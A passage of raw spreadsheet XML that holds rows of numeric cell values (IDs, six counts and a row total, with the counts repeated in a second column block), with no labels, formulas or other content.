        <v>26</v>
      </c>
      <c r="K227" s="7">
        <v>577</v>
      </c>
      <c r="L227" s="8">
        <v>15</v>
      </c>
      <c r="M227" s="8">
        <v>0</v>
      </c>
      <c r="N227" s="8">
        <v>3</v>
      </c>
      <c r="O227" s="8">
        <v>5</v>
      </c>
      <c r="P227" s="8">
        <v>1</v>
      </c>
      <c r="Q227" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="228" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A228" s="7">
        <v>578</v>
      </c>
      <c r="B228" s="8">
        <v>25</v>
      </c>
      <c r="C228" s="8">
        <v>1</v>
      </c>
      <c r="D228" s="8">
        <v>15</v>
      </c>
      <c r="E228" s="8">
        <v>30</v>
      </c>
      <c r="F228" s="8">
        <v>1</v>
      </c>
      <c r="G228" s="8">
        <v>1</v>
      </c>
      <c r="H228" s="8">
        <v>73</v>
      </c>
      <c r="K228" s="7">
        <v>578</v>
      </c>
      <c r="L228" s="8">
        <v>25</v>
      </c>
      <c r="M228" s="8">
        <v>1</v>
      </c>
      <c r="N228" s="8">
        <v>15</v>
      </c>
      <c r="O228" s="8">
        <v>30</v>
      </c>
      <c r="P228" s="8">
        <v>1</v>
      </c>
      <c r="Q228" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="229" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A229" s="7">
        <v>581</v>
      </c>
      <c r="B229" s="8">
        <v>25</v>
      </c>
      <c r="C229" s="8">
        <v>1</v>
      </c>
      <c r="D229" s="8">
        <v>15</v>
      </c>
      <c r="E229" s="8">
        <v>10</v>
      </c>
      <c r="F229" s="8">
        <v>6</v>
      </c>
      <c r="G229" s="8">
        <v>4</v>
      </c>
      <c r="H229" s="8">
        <v>61</v>
      </c>
      <c r="K229" s="7">
        <v>581</v>
      </c>
      <c r="L229" s="8">
        <v>25</v>
      </c>
      <c r="M229" s="8">
        <v>1</v>
      </c>
      <c r="N229" s="8">
        <v>15</v>
      </c>
      <c r="O229" s="8">
        <v>10</v>
      </c>
      <c r="P229" s="8">
        <v>6</v>
      </c>
      <c r="Q229" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="230" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A230" s="7">
        <v>582</v>
      </c>
      <c r="B230" s="8">
        <v>26</v>
      </c>
      <c r="C230" s="8">
        <v>1</v>
      </c>
      <c r="D230" s="8">
        <v>0</v>
      </c>
      <c r="E230" s="8">
        <v>0</v>
      </c>
      <c r="F230" s="8">
        <v>15</v>
      </c>
      <c r="G230" s="8">
        <v>1</v>
      </c>
      <c r="H230" s="8">
        <v>43</v>
      </c>
      <c r="K230" s="7">
        <v>582</v>
      </c>
      <c r="L230" s="8">
        <v>26</v>
      </c>
      <c r="M230" s="8">
        <v>1</v>
      </c>
      <c r="N230" s="8">
        <v>0</v>
      </c>
      <c r="O230" s="8">
        <v>0</v>
      </c>
      <c r="P230" s="8">
        <v>15</v>
      </c>
      <c r="Q230" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="231" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A231" s="7">
        <v>583</v>
      </c>
      <c r="B231" s="8">
        <v>26</v>
      </c>
      <c r="C231" s="8">
        <v>0</v>
      </c>
      <c r="D231" s="8">
        <v>0</v>
      </c>
      <c r="E231" s="8">
        <v>0</v>
      </c>
      <c r="F231" s="8">
        <v>1</v>
      </c>
      <c r="G231" s="8">
        <v>4</v>
      </c>
      <c r="H231" s="8">
        <v>31</v>
      </c>
      <c r="K231" s="7">
        <v>583</v>
      </c>
      <c r="L231" s="8">
        <v>26</v>
      </c>
      <c r="M231" s="8">
        <v>0</v>
      </c>
      <c r="N231" s="8">
        <v>0</v>
      </c>
      <c r="O231" s="8">
        <v>0</v>
      </c>
      <c r="P231" s="8">
        <v>1</v>
      </c>
      <c r="Q231" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="232" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A232" s="7">
        <v>586</v>
      </c>
      <c r="B232" s="8">
        <v>5</v>
      </c>
      <c r="C232" s="8">
        <v>1</v>
      </c>
      <c r="D232" s="8">
        <v>3</v>
      </c>
      <c r="E232" s="8">
        <v>5</v>
      </c>
      <c r="F232" s="8">
        <v>1</v>
      </c>
      <c r="G232" s="8">
        <v>1</v>
      </c>
      <c r="H232" s="8">
        <v>16</v>
      </c>
      <c r="K232" s="7">
        <v>586</v>
      </c>
      <c r="L232" s="8">
        <v>5</v>
      </c>
      <c r="M232" s="8">
        <v>1</v>
      </c>
      <c r="N232" s="8">
        <v>3</v>
      </c>
      <c r="O232" s="8">
        <v>5</v>
      </c>
      <c r="P232" s="8">
        <v>1</v>
      </c>
      <c r="Q232" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="233" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A233" s="7">
        <v>588</v>
      </c>
      <c r="B233" s="8">
        <v>0</v>
      </c>
      <c r="C233" s="8">
        <v>0</v>
      </c>
      <c r="D233" s="8">
        <v>3</v>
      </c>
      <c r="E233" s="8">
        <v>36</v>
      </c>
      <c r="F233" s="8">
        <v>1</v>
      </c>
      <c r="G233" s="8">
        <v>0</v>
      </c>
      <c r="H233" s="8">
        <v>40</v>
      </c>
      <c r="K233" s="7">
        <v>588</v>
      </c>
      <c r="L233" s="8">
        <v>0</v>
      </c>
      <c r="M233" s="8">
        <v>0</v>
      </c>
      <c r="N233" s="8">
        <v>3</v>
      </c>
      <c r="O233" s="8">
        <v>36</v>
      </c>
      <c r="P233" s="8">
        <v>1</v>
      </c>
      <c r="Q233" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="234" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A234" s="7">
        <v>590</v>
      </c>
      <c r="B234" s="8">
        <v>24</v>
      </c>
      <c r="C234" s="8">
        <v>1</v>
      </c>
      <c r="D234" s="8">
        <v>15</v>
      </c>
      <c r="E234" s="8">
        <v>30</v>
      </c>
      <c r="F234" s="8">
        <v>15</v>
      </c>
      <c r="G234" s="8">
        <v>13</v>
      </c>
      <c r="H234" s="8">
        <v>98</v>
      </c>
      <c r="K234" s="7">
        <v>590</v>
      </c>
      <c r="L234" s="8">
        <v>24</v>
      </c>
      <c r="M234" s="8">
        <v>1</v>
      </c>
      <c r="N234" s="8">
        <v>15</v>
      </c>
      <c r="O234" s="8">
        <v>30</v>
      </c>
      <c r="P234" s="8">
        <v>15</v>
      </c>
      <c r="Q234" s="8">
        <v>13</v>
      </c>
    </row>
    <row r="235" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A235" s="7">
        <v>592</v>
      </c>
      <c r="B235" s="8">
        <v>26</v>
      </c>
      <c r="C235" s="8">
        <v>0</v>
      </c>
      <c r="D235" s="8">
        <v>20</v>
      </c>
      <c r="E235" s="8">
        <v>2</v>
      </c>
      <c r="F235" s="8">
        <v>2</v>
      </c>
      <c r="G235" s="8">
        <v>4</v>
      </c>
      <c r="H235" s="8">
        <v>54</v>
      </c>
      <c r="K235" s="7">
        <v>592</v>
      </c>
      <c r="L235" s="8">
        <v>26</v>
      </c>
      <c r="M235" s="8">
        <v>0</v>
      </c>
      <c r="N235" s="8">
        <v>20</v>
      </c>
      <c r="O235" s="8">
        <v>2</v>
      </c>
      <c r="P235" s="8">
        <v>2</v>
      </c>
      <c r="Q235" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="236" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A236" s="7">
        <v>593</v>
      </c>
      <c r="B236" s="8">
        <v>26</v>
      </c>
      <c r="C236" s="8">
        <v>1</v>
      </c>
      <c r="D236" s="8">
        <v>6</v>
      </c>
      <c r="E236" s="8">
        <v>0</v>
      </c>
      <c r="F236" s="8">
        <v>4</v>
      </c>
      <c r="G236" s="8">
        <v>2</v>
      </c>
      <c r="H236" s="8">
        <v>39</v>
      </c>
      <c r="K236" s="7">
        <v>593</v>
      </c>
      <c r="L236" s="8">
        <v>26</v>
      </c>
      <c r="M236" s="8">
        <v>1</v>
      </c>
      <c r="N236" s="8">
        <v>6</v>
      </c>
      <c r="O236" s="8">
        <v>0</v>
      </c>
      <c r="P236" s="8">
        <v>4</v>
      </c>
      <c r="Q236" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="237" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A237" s="7">
        <v>594</v>
      </c>
      <c r="B237" s="8">
        <v>24</v>
      </c>
      <c r="C237" s="8">
        <v>1</v>
      </c>
      <c r="D237" s="8">
        <v>4</v>
      </c>
      <c r="E237" s="8">
        <v>16</v>
      </c>
      <c r="F237" s="8">
        <v>6</v>
      </c>
      <c r="G237" s="8">
        <v>2</v>
      </c>
      <c r="H237" s="8">
        <v>53</v>
      </c>
      <c r="K237" s="7">
        <v>594</v>
      </c>
      <c r="L237" s="8">
        <v>24</v>
      </c>
      <c r="M237" s="8">
        <v>1</v>
      </c>
      <c r="N237" s="8">
        <v>4</v>
      </c>
      <c r="O237" s="8">
        <v>16</v>
      </c>
      <c r="P237" s="8">
        <v>6</v>
      </c>
      <c r="Q237" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="238" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A238" s="7">
        <v>596</v>
      </c>
      <c r="B238" s="8">
        <v>0</v>
      </c>
      <c r="C238" s="8">
        <v>0</v>
      </c>
      <c r="D238" s="8">
        <v>0</v>
      </c>
      <c r="E238" s="8">
        <v>0</v>
      </c>
      <c r="F238" s="8">
        <v>12</v>
      </c>
      <c r="G238" s="8">
        <v>2</v>
      </c>
      <c r="H238" s="8">
        <v>14</v>
      </c>
      <c r="K238" s="7">
        <v>596</v>
      </c>
      <c r="L238" s="8">
        <v>0</v>
      </c>
      <c r="M238" s="8">
        <v>0</v>
      </c>
      <c r="N238" s="8">
        <v>0</v>
      </c>
      <c r="O238" s="8">
        <v>0</v>
      </c>
      <c r="P238" s="8">
        <v>12</v>
      </c>
      <c r="Q238" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="239" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A239" s="7">
        <v>597</v>
      </c>
      <c r="B239" s="8">
        <v>25</v>
      </c>
      <c r="C239" s="8">
        <v>0</v>
      </c>
      <c r="D239" s="8">
        <v>0</v>
      </c>
      <c r="E239" s="8">
        <v>0</v>
      </c>
      <c r="F239" s="8">
        <v>6</v>
      </c>
      <c r="G239" s="8">
        <v>16</v>
      </c>
      <c r="H239" s="8">
        <v>47</v>
      </c>
      <c r="K239" s="7">
        <v>597</v>
      </c>
      <c r="L239" s="8">
        <v>25</v>
      </c>
      <c r="M239" s="8">
        <v>0</v>
      </c>
      <c r="N239" s="8">
        <v>0</v>
      </c>
      <c r="O239" s="8">
        <v>0</v>
      </c>
      <c r="P239" s="8">
        <v>6</v>
      </c>
      <c r="Q239" s="8">
        <v>16</v>
      </c>
    </row>
    <row r="240" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A240" s="7">
        <v>600</v>
      </c>
      <c r="B240" s="8">
        <v>25</v>
      </c>
      <c r="C240" s="8">
        <v>1</v>
      </c>
      <c r="D240" s="8">
        <v>19</v>
      </c>
      <c r="E240" s="8">
        <v>149</v>
      </c>
      <c r="F240" s="8">
        <v>3</v>
      </c>
      <c r="G240" s="8">
        <v>1</v>
      </c>
      <c r="H240" s="8">
        <v>198</v>
      </c>
      <c r="K240" s="7">
        <v>600</v>
      </c>
      <c r="L240" s="8">
        <v>25</v>
      </c>
      <c r="M240" s="8">
        <v>1</v>
      </c>
      <c r="N240" s="8">
        <v>19</v>
      </c>
      <c r="O240" s="8">
        <v>149</v>
      </c>
      <c r="P240" s="8">
        <v>3</v>
      </c>
      <c r="Q240" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="241" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A241" s="7">
        <v>601</v>
      </c>
      <c r="B241" s="8">
        <v>30</v>
      </c>
      <c r="C241" s="8">
        <v>0</v>
      </c>
      <c r="D241" s="8">
        <v>9</v>
      </c>
      <c r="E241" s="8">
        <v>1</v>
      </c>
      <c r="F241" s="8">
        <v>6</v>
      </c>
      <c r="G241" s="8">
        <v>3</v>
      </c>
      <c r="H241" s="8">
        <v>49</v>
      </c>
      <c r="K241" s="7">
        <v>601</v>
      </c>
      <c r="L241" s="8">
        <v>30</v>
      </c>
      <c r="M241" s="8">
        <v>0</v>
      </c>
      <c r="N241" s="8">
        <v>9</v>
      </c>
      <c r="O241" s="8">
        <v>1</v>
      </c>
      <c r="P241" s="8">
        <v>6</v>
      </c>
      <c r="Q241" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="242" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A242" s="7">
        <v>603</v>
      </c>
      <c r="B242" s="8">
        <v>6</v>
      </c>
      <c r="C242" s="8">
        <v>0</v>
      </c>
      <c r="D242" s="8">
        <v>10</v>
      </c>
      <c r="E242" s="8">
        <v>0</v>
      </c>
      <c r="F242" s="8">
        <v>4</v>
      </c>
      <c r="G242" s="8">
        <v>0</v>
      </c>
      <c r="H242" s="8">
        <v>20</v>
      </c>
      <c r="K242" s="7">
        <v>603</v>
      </c>
      <c r="L242" s="8">
        <v>6</v>
      </c>
      <c r="M242" s="8">
        <v>0</v>
      </c>
      <c r="N242" s="8">
        <v>10</v>
      </c>
      <c r="O242" s="8">
        <v>0</v>
      </c>
      <c r="P242" s="8">
        <v>4</v>
      </c>
      <c r="Q242" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="243" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A243" s="7">
        <v>604</v>
      </c>
      <c r="B243" s="8">
        <v>6</v>
      </c>
      <c r="C243" s="8">
        <v>0</v>
      </c>
      <c r="D243" s="8">
        <v>40</v>
      </c>
      <c r="E243" s="8">
        <v>198</v>
      </c>
      <c r="F243" s="8">
        <v>26</v>
      </c>
      <c r="G243" s="8">
        <v>25</v>
      </c>
      <c r="H243" s="8">
        <v>295</v>
      </c>
      <c r="K243" s="7">
        <v>604</v>
      </c>
      <c r="L243" s="8">
        <v>6</v>
      </c>
      <c r="M243" s="8">
        <v>0</v>
      </c>
      <c r="N243" s="8">
        <v>40</v>
      </c>
      <c r="O243" s="8">
        <v>198</v>
      </c>
      <c r="P243" s="8">
        <v>26</v>
      </c>
      <c r="Q243" s="8">
        <v>25</v>
      </c>
    </row>
    <row r="244" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A244" s="7">
        <v>606</v>
      </c>
      <c r="B244" s="8">
        <v>6</v>
      </c>
      <c r="C244" s="8">
        <v>1</v>
      </c>
      <c r="D244" s="8">
        <v>12</v>
      </c>
      <c r="E244" s="8">
        <v>6</v>
      </c>
      <c r="F244" s="8">
        <v>10</v>
      </c>
      <c r="G244" s="8">
        <v>5</v>
      </c>
      <c r="H244" s="8">
        <v>40</v>
      </c>
      <c r="K244" s="7">
        <v>606</v>
      </c>
      <c r="L244" s="8">
        <v>6</v>
      </c>
      <c r="M244" s="8">
        <v>1</v>
      </c>
      <c r="N244" s="8">
        <v>12</v>
      </c>
      <c r="O244" s="8">
        <v>6</v>
      </c>
      <c r="P244" s="8">
        <v>10</v>
      </c>
      <c r="Q244" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="245" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A245" s="7">
        <v>608</v>
      </c>
      <c r="B245" s="8">
        <v>26</v>
      </c>
      <c r="C245" s="8">
        <v>1</v>
      </c>
      <c r="D245" s="8">
        <v>5</v>
      </c>
      <c r="E245" s="8">
        <v>5</v>
      </c>
      <c r="F245" s="8">
        <v>3</v>
      </c>
      <c r="G245" s="8">
        <v>2</v>
      </c>
      <c r="H245" s="8">
        <v>42</v>
      </c>
      <c r="K245" s="7">
        <v>608</v>
      </c>
      <c r="L245" s="8">
        <v>26</v>
      </c>
      <c r="M245" s="8">
        <v>1</v>
      </c>
      <c r="N245" s="8">
        <v>5</v>
      </c>
      <c r="O245" s="8">
        <v>5</v>
      </c>
      <c r="P245" s="8">
        <v>3</v>
      </c>
      <c r="Q245" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="246" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A246" s="7">
        <v>609</v>
      </c>
      <c r="B246" s="8">
        <v>24</v>
      </c>
      <c r="C246" s="8">
        <v>0</v>
      </c>
      <c r="D246" s="8">
        <v>6</v>
      </c>
      <c r="E246" s="8">
        <v>5</v>
      </c>
      <c r="F246" s="8">
        <v>6</v>
      </c>
      <c r="G246" s="8">
        <v>1</v>
      </c>
      <c r="H246" s="8">
        <v>42</v>
      </c>
      <c r="K246" s="7">
        <v>609</v>
      </c>
      <c r="L246" s="8">
        <v>24</v>
      </c>
      <c r="M246" s="8">
        <v>0</v>
      </c>
      <c r="N246" s="8">
        <v>6</v>
      </c>
      <c r="O246" s="8">
        <v>5</v>
      </c>
      <c r="P246" s="8">
        <v>6</v>
      </c>
      <c r="Q246" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="247" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A247" s="7">
        <v>610</v>
      </c>
      <c r="B247" s="8">
        <v>25</v>
      </c>
      <c r="C247" s="8">
        <v>0</v>
      </c>
      <c r="D247" s="8">
        <v>73</v>
      </c>
      <c r="E247" s="8">
        <v>163</v>
      </c>
      <c r="F247" s="8">
        <v>50</v>
      </c>
      <c r="G247" s="8">
        <v>29</v>
      </c>
      <c r="H247" s="8">
        <v>340</v>
      </c>
      <c r="K247" s="7">
        <v>610</v>
      </c>
      <c r="L247" s="8">
        <v>25</v>
      </c>
      <c r="M247" s="8">
        <v>0</v>
      </c>
      <c r="N247" s="8">
        <v>73</v>
      </c>
      <c r="O247" s="8">
        <v>163</v>
      </c>
      <c r="P247" s="8">
        <v>50</v>
      </c>
      <c r="Q247" s="8">
        <v>29</v>
      </c>
    </row>
    <row r="248" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A248" s="7">
        <v>613</v>
      </c>
      <c r="B248" s="8">
        <v>6</v>
      </c>
      <c r="C248" s="8">
        <v>1</v>
      </c>
      <c r="D248" s="8">
        <v>4</v>
      </c>
      <c r="E248" s="8">
        <v>0</v>
      </c>
      <c r="F248" s="8">
        <v>1</v>
      </c>
      <c r="G248" s="8">
        <v>0</v>
      </c>
      <c r="H248" s="8">
        <v>12</v>
      </c>
      <c r="K248" s="7">
        <v>613</v>
      </c>
      <c r="L248" s="8">
        <v>6</v>
      </c>
      <c r="M248" s="8">
        <v>1</v>
      </c>
      <c r="N248" s="8">
        <v>4</v>
      </c>
      <c r="O248" s="8">
        <v>0</v>
      </c>
      <c r="P248" s="8">
        <v>1</v>
      </c>
      <c r="Q248" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="249" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A249" s="7">
        <v>618</v>
      </c>
      <c r="B249" s="8">
        <v>26</v>
      </c>
      <c r="C249" s="8">
        <v>2</v>
      </c>
      <c r="D249" s="8">
        <v>129</v>
      </c>
      <c r="E249" s="8">
        <v>896</v>
      </c>
      <c r="F249" s="8">
        <v>41</v>
      </c>
      <c r="G249" s="8">
        <v>21</v>
      </c>
      <c r="H249" s="8">
        <v>1115</v>
      </c>
      <c r="K249" s="7">
        <v>618</v>
      </c>
      <c r="L249" s="8">
        <v>26</v>
      </c>
      <c r="M249" s="8">
        <v>2</v>
      </c>
      <c r="N249" s="8">
        <v>129</v>
      </c>
      <c r="O249" s="8">
        <v>896</v>
      </c>
      <c r="P249" s="8">
        <v>41</v>
      </c>
      <c r="Q249" s="8">
        <v>21</v>
      </c>
    </row>
    <row r="250" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A250" s="7">
        <v>621</v>
      </c>
      <c r="B250" s="8">
        <v>26</v>
      </c>
      <c r="C250" s="8">
        <v>1</v>
      </c>
      <c r="D250" s="8">
        <v>0</v>
      </c>
      <c r="E250" s="8">
        <v>340</v>
      </c>
      <c r="F250" s="8">
        <v>143</v>
      </c>
      <c r="G250" s="8">
        <v>177</v>
      </c>
      <c r="H250" s="8">
        <v>687</v>
      </c>
      <c r="K250" s="7">
        <v>621</v>
      </c>
      <c r="L250" s="8">
        <v>26</v>
      </c>
      <c r="M250" s="8">
        <v>1</v>
      </c>
      <c r="N250" s="8">
        <v>0</v>
      </c>
      <c r="O250" s="8">
        <v>340</v>
      </c>
      <c r="P250" s="8">
        <v>143</v>
      </c>
      <c r="Q250" s="8">
        <v>177</v>
      </c>
    </row>
    <row r="251" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A251" s="7">
        <v>622</v>
      </c>
      <c r="B251" s="8">
        <v>27</v>
      </c>
      <c r="C251" s="8">
        <v>1</v>
      </c>
      <c r="D251" s="8">
        <v>12</v>
      </c>
      <c r="E251" s="8">
        <v>0</v>
      </c>
      <c r="F251" s="8">
        <v>2</v>
      </c>
      <c r="G251" s="8">
        <v>1</v>
      </c>
      <c r="H251" s="8">
        <v>43</v>
      </c>
      <c r="K251" s="7">
        <v>622</v>
      </c>
      <c r="L251" s="8">
        <v>27</v>
      </c>
      <c r="M251" s="8">
        <v>1</v>
      </c>
      <c r="N251" s="8">
        <v>12</v>
      </c>
      <c r="O251" s="8">
        <v>0</v>
      </c>
      <c r="P251" s="8">
        <v>2</v>
      </c>
      <c r="Q251" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="252" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A252" s="7">
        <v>624</v>
      </c>
      <c r="B252" s="8">
        <v>0</v>
      </c>
      <c r="C252" s="8">
        <v>0</v>
      </c>
      <c r="D252" s="8">
        <v>10</v>
      </c>
      <c r="E252" s="8">
        <v>0</v>
      </c>
      <c r="F252" s="8">
        <v>2</v>
      </c>
      <c r="G252" s="8">
        <v>1</v>
      </c>
      <c r="H252" s="8">
        <v>13</v>
      </c>
      <c r="K252" s="7">
        <v>624</v>
      </c>
      <c r="L252" s="8">
        <v>0</v>
      </c>
      <c r="M252" s="8">
        <v>0</v>
      </c>
      <c r="N252" s="8">
        <v>10</v>
      </c>
      <c r="O252" s="8">
        <v>0</v>
      </c>
      <c r="P252" s="8">
        <v>2</v>
      </c>
      <c r="Q252" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="253" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A253" s="7">
        <v>625</v>
      </c>
      <c r="B253" s="8">
        <v>25</v>
      </c>
      <c r="C253" s="8">
        <v>3</v>
      </c>
      <c r="D253" s="8">
        <v>192</v>
      </c>
      <c r="E253" s="8">
        <v>335</v>
      </c>
      <c r="F253" s="8">
        <v>75</v>
      </c>
      <c r="G253" s="8">
        <v>26</v>
      </c>
      <c r="H253" s="8">
        <v>656</v>
      </c>
      <c r="K253" s="7">
        <v>625</v>
      </c>
      <c r="L253" s="8">
        <v>25</v>
      </c>
      <c r="M253" s="8">
        <v>3</v>
      </c>
      <c r="N253" s="8">
        <v>192</v>
      </c>
      <c r="O253" s="8">
        <v>335</v>
      </c>
      <c r="P253" s="8">
        <v>75</v>
      </c>
      <c r="Q253" s="8">
        <v>26</v>
      </c>
    </row>
    <row r="254" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A254" s="7">
        <v>627</v>
      </c>
      <c r="B254" s="8">
        <v>6</v>
      </c>
      <c r="C254" s="8">
        <v>0</v>
      </c>
      <c r="D254" s="8">
        <v>31</v>
      </c>
      <c r="E254" s="8">
        <v>0</v>
      </c>
      <c r="F254" s="8">
        <v>13</v>
      </c>
      <c r="G254" s="8">
        <v>4</v>
      </c>
      <c r="H254" s="8">
        <v>54</v>
      </c>
      <c r="K254" s="7">
        <v>627</v>
      </c>
      <c r="L254" s="8">
        <v>6</v>
      </c>
      <c r="M254" s="8">
        <v>0</v>
      </c>
      <c r="N254" s="8">
        <v>31</v>
      </c>
      <c r="O254" s="8">
        <v>0</v>
      </c>
      <c r="P254" s="8">
        <v>13</v>
      </c>
      <c r="Q254" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="255" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A255" s="7">
        <v>631</v>
      </c>
      <c r="B255" s="8">
        <v>0</v>
      </c>
      <c r="C255" s="8">
        <v>0</v>
      </c>
      <c r="D255" s="8">
        <v>2</v>
      </c>
      <c r="E255" s="8">
        <v>3</v>
      </c>
      <c r="F255" s="8">
        <v>2</v>
      </c>
      <c r="G255" s="8">
        <v>3</v>
      </c>
      <c r="H255" s="8">
        <v>10</v>
      </c>
      <c r="K255" s="7">
        <v>631</v>
      </c>
      <c r="L255" s="8">
        <v>0</v>
      </c>
      <c r="M255" s="8">
        <v>0</v>
      </c>
      <c r="N255" s="8">
        <v>2</v>
      </c>
      <c r="O255" s="8">
        <v>3</v>
      </c>
      <c r="P255" s="8">
        <v>2</v>
      </c>
      <c r="Q255" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="256" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A256" s="7">
        <v>632</v>
      </c>
      <c r="B256" s="8">
        <v>24</v>
      </c>
      <c r="C256" s="8">
        <v>3</v>
      </c>
      <c r="D256" s="8">
        <v>56</v>
      </c>
      <c r="E256" s="8">
        <v>2</v>
      </c>
      <c r="F256" s="8">
        <v>31</v>
      </c>
      <c r="G256" s="8">
        <v>1</v>
      </c>
      <c r="H256" s="8">
        <v>117</v>
      </c>
      <c r="K256" s="7">
        <v>632</v>
      </c>
      <c r="L256" s="8">
        <v>24</v>
      </c>
      <c r="M256" s="8">
        <v>3</v>
      </c>
      <c r="N256" s="8">
        <v>56</v>
      </c>
      <c r="O256" s="8">
        <v>2</v>
      </c>
      <c r="P256" s="8">
        <v>31</v>
      </c>
      <c r="Q256" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="257" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A257" s="7">
        <v>633</v>
      </c>
      <c r="B257" s="8">
        <v>0</v>
      </c>
      <c r="C257" s="8">
        <v>0</v>
      </c>
      <c r="D257" s="8">
        <v>0</v>
      </c>
      <c r="E257" s="8">
        <v>0</v>
      </c>
      <c r="F257" s="8">
        <v>8</v>
      </c>
      <c r="G257" s="8">
        <v>3</v>
      </c>
      <c r="H257" s="8">
        <v>11</v>
      </c>
      <c r="K257" s="7">
        <v>633</v>
      </c>
      <c r="L257" s="8">
        <v>0</v>
      </c>
      <c r="M257" s="8">
        <v>0</v>
      </c>
      <c r="N257" s="8">
        <v>0</v>
      </c>
      <c r="O257" s="8">
        <v>0</v>
      </c>
      <c r="P257" s="8">
        <v>8</v>
      </c>
      <c r="Q257" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="258" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A258" s="7">
        <v>634</v>
      </c>
      <c r="B258" s="8">
        <v>360</v>
      </c>
      <c r="C258" s="8">
        <v>0</v>
      </c>
      <c r="D258" s="8">
        <v>35</v>
      </c>
      <c r="E258" s="8">
        <v>55</v>
      </c>
      <c r="F258" s="8">
        <v>2</v>
      </c>
      <c r="G258" s="8">
        <v>0</v>
      </c>
      <c r="H258" s="8">
        <v>452</v>
      </c>
      <c r="K258" s="7">
        <v>634</v>
      </c>
      <c r="L258" s="8">
        <v>360</v>
      </c>
      <c r="M258" s="8">
        <v>0</v>
      </c>
      <c r="N258" s="8">
        <v>35</v>
      </c>
      <c r="O258" s="8">
        <v>55</v>
      </c>
      <c r="P258" s="8">
        <v>2</v>
      </c>
      <c r="Q258" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="259" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A259" s="7">
        <v>639</v>
      </c>
      <c r="B259" s="8">
        <v>24</v>
      </c>
      <c r="C259" s="8">
        <v>1</v>
      </c>
      <c r="D259" s="8">
        <v>0</v>
      </c>
      <c r="E259" s="8">
        <v>1</v>
      </c>
      <c r="F259" s="8">
        <v>0</v>
      </c>
      <c r="G259" s="8">
        <v>9</v>
      </c>
      <c r="H259" s="8">
        <v>35</v>
      </c>
      <c r="K259" s="7">
        <v>639</v>
      </c>
      <c r="L259" s="8">
        <v>24</v>
      </c>
      <c r="M259" s="8">
        <v>1</v>
      </c>
      <c r="N259" s="8">
        <v>0</v>
      </c>
      <c r="O259" s="8">
        <v>1</v>
      </c>
      <c r="P259" s="8">
        <v>0</v>
      </c>
      <c r="Q259" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="260" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A260" s="7">
        <v>640</v>
      </c>
      <c r="B260" s="8">
        <v>26</v>
      </c>
      <c r="C260" s="8">
        <v>1</v>
      </c>
      <c r="D260" s="8">
        <v>10</v>
      </c>
      <c r="E260" s="8">
        <v>20</v>
      </c>
      <c r="F260" s="8">
        <v>9</v>
      </c>
      <c r="G260" s="8">
        <v>8</v>
      </c>
      <c r="H260" s="8">
        <v>74</v>
      </c>
      <c r="K260" s="7">
        <v>640</v>
      </c>
      <c r="L260" s="8">
        <v>26</v>
      </c>
      <c r="M260" s="8">
        <v>1</v>
      </c>
      <c r="N260" s="8">
        <v>10</v>
      </c>
      <c r="O260" s="8">
        <v>20</v>
      </c>
      <c r="P260" s="8">
        <v>9</v>
      </c>
      <c r="Q260" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="261" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A261" s="7">
        <v>642</v>
      </c>
      <c r="B261" s="8">
        <v>25</v>
      </c>
      <c r="C261" s="8">
        <v>1</v>
      </c>
      <c r="D261" s="8">
        <v>30</v>
      </c>
      <c r="E261" s="8">
        <v>93</v>
      </c>
      <c r="F261" s="8">
        <v>3</v>
      </c>
      <c r="G261" s="8">
        <v>2</v>
      </c>
      <c r="H261" s="8">
